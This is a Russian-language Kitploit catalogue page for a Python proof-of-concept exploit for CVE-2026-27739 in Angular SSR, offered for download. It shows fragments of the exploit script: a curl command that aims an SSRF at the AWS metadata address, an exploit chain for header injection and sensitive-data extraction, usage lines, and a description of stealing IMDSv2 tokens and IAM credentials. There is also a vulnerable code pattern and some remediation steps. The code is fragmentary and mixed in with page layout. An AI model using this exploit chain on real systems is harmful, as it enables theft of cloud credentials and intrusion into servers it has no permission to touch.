Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-27739-POC — Python PoC, эксплуатирующий CVE-2026-27739 в Angular SSR: инъекция заголовков через загрязнение прототипа и цепочка SSRF к AWS IMDS/GCP metadata для кражи учётных данных. | Kitploit
Инструменты/GitHubGitHub/mr-redoo7/cve-2026-27739-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на ПроникновениеБезопасность API
GitHubmr-redoo7/cve-2026-27739-poc

CVE-2026-27739-POC

Python PoC, эксплуатирующий CVE-2026-27739 в Angular SSR: инъекция заголовков через загрязнение прототипа и цепочка SSRF к AWS IMDS/GCP metadata для кражи учётных данных.

Репозиторий
5 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

-CVE-2026-27739-poc

curl -H "X-Forwarded-For: http://169.254.169.254/latest/meta-data/" {self.target}

2. Инъекция заголовков через загрязнение прототипа (CVSS: 7.5)

Описание: Angular SSR обрабатывает небезопасные параметры запроса, влияющие на цепочку прототипов Воздействие: Манипуляция заголовками запроса, потенциальная цепочка SSRF

Устранение

  1. Удалить/отключить обработку заголовков X-Forwarded-* или добавить известные прокси в белый список
  2. Реализовать строгую валидацию URL перед операциями, подверженными SSRF
  3. Использовать express-validator или аналогичный инструмент для санитизации заголовков
  4. Отключить эндпоинты метаданных AWS/GCP или использовать IMDSv2 с ограничением переходов """ print(report) with open("angular_ssr_exploit_report.txt", "w") as f: f.write(report)

def main(): parser = argparse.ArgumentParser(description="Angular SSR SSRF & Header Injection Exploit") parser.add_argument("target", help="Target Angular SSR application URL") parser.add_argument("--no-ssl-verify", action="store_true", help="Disable SSL verification")

root@kitploit:~
args = parser.parse_args()

exploit = AngularSSRExploit(args.target, ssl_verify=not args.no_ssl_verify)

print(f"[+] Targeting: {args.target}")
print(f"[+] SSL Verify: {'Disabled' if args.no_ssl_verify else 'Enabled'}")

# Execute exploit chain
exploit.test_header_injection()
exploit.exploit_ssrf_chain()
exploit.extract_sensitive_data()
exploit.generate_report()

if name == "main": main() Использование bash

Basic SSRF test

python3 angular_ssr_exploit.py https://target.com

With SSL bypass for self-signed certs

python3 angular_ssr_exploit.py https://target.com --no-ssl-verify Как это работает Тест инъекции заголовков: Отправляет полезные нагрузки загрязнения прототипа и небезопасные пересылаемые заголовки, которые Angular SSR может обрабатывать небезопасно Цепочка SSRF: Проверяет доступ к AWS IMDS, метаданным GCP, локальным сервисам через X-Forwarded-For/X-Original-URL Извлечение токена IMDSv2: Связывает SSRF для кражи токенов метаданных AWS, затем учётных данных IAM Автоматическая отчётность: Генерирует отчёт о пентесте с оценкой CVSS и PoC Технические детали Первопричина: Приложения Angular Universal SSR часто пересылают req.headers напрямую во внутренние API без санитизации:

javascript

// Vulnerable Angular SSR pattern app.get('*', (req, res) => { const url = req.headers['x-original-url'] || req.originalUrl; // SSRF internalFetch(url, { headers: req.headers }); // Header injection });

Скачать инструмент